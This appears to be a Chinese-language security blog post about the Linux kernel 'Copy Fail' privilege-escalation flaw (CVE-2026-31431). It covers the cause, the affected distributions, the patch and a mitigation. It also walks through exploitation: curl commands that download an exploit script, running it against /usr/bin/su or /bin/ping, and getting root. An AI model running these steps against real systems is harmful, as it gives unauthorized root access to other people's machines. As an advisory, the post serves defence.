最近,Linux 安全圈出现了一个值得高度警惕的漏洞:
漏洞代号:Copy Fail CVE-2026-31431[1]
这是一个无需复杂条件、可稳定利用的本地提权漏洞。一旦被利用,攻击者可以:
👉 从普通用户直接获取 root 权限

Linux Kernel是整个系统的核心:
几乎全部依赖它运行。
而这次漏洞影响的是:
👉 内核 Crypto API(加密子系统)
这意味着:
攻击面广 + 利用价值极高
先用一句话讲清本质👇
一次性能优化,引入了一个可控内存越界写漏洞
在 2017 年的一次优化中(commit 72548b093ee3):
👉 内核引入了 in-place(就地)解密机制
也就是说:
本意是:
👉 提升性能
但问题来了👇
在 authencesn 算法处理中:
assoclen + cryptlen 位置写入 4 字节数据当通过 recvmsg() 触发解密时:
👉 这 4 字节写入可能越界
由于 AF_ALG 使用了 splice():
👉 数据可能直接映射到文件页缓存(page cache)
最终效果:
💣 攻击者可以篡改任意已打开文件的页缓存内容(4 字节)
很多漏洞“理论上危险”,但难利用。
这个不一样👇
👉 利用门槛极低
攻击者可以修改:
/usr/bin/su或其他:
setuid程序👉 实现 直接提权
关键点来了👇
修改的是 页缓存(内存),不是磁盘文件
意味着:
👉 隐蔽性极高
攻击者可以:
Linux Kernel 本地权限提升漏洞(Copy Fail)CVE-2026-3143172548b093ee3 <= commit < a664bf3d603d目前已确认影响的系统包括:
Ubuntu 24.04 LTSAmazon Linux 2023Red Hat Enterprise Linux 8 / 9 / 10SUSE 16👉 以及其他基于相关内核版本的发行版
# 推荐方式curl -O https://github.com/theori-io/copy-fail-CVE-2026-31431#或者官方提供的快捷方式curl https://copy.fail/exp -o copy_fail_exp.py运行脚本之前先要备份
/usr/bin/su的文件
python3 copy_fail_exp.py脚本默认会针对
/usr/bin/su进行攻击,你也可以指定其他setuid二进制:
python3 copy_fail_exp.py /bin/ping整个过程同城在几秒到十几秒内完成,脚本会自动完成page cache注入。
su#或者直接执行sudo -i成功的话,你会直接获取root权限(无需输入密码),输入id命令应该显示uid=0(root)
### 清理page cache (推荐)echo 3 > /proc/sys/vm/drop_caches# 回复原始文件sudo cp -a /usr/bin/su.bak /usr/bin/su官方补丁已发布[2]
只要满足:
commit >= a664bf3d603d即可修复漏洞。
👉 建议订阅安全更新通知
如果短时间无法升级,可以:
👉 禁用受影响模块
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf然后执行:
reboot⚠️ 注意这是临时措施:
• 可能影响依赖 AEAD 的应用 • 不能替代补丁升级
Copy Fail(CVE-2026-31431)的危险在于:
📌 一句话结论: 如果你还没升级内核,那你的服务器就已经处于风险之中。
[1] CVE-2026-31431: https://www.cve.org/CVERecord?id=CVE-2026-31431[2] 官方补丁已发布: https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5[3] Ubuntu: https://ubuntu.com/security/CVE-2026-31431[4] Red Hat: https://access.redhat.com/security/cve/cve-2026-31431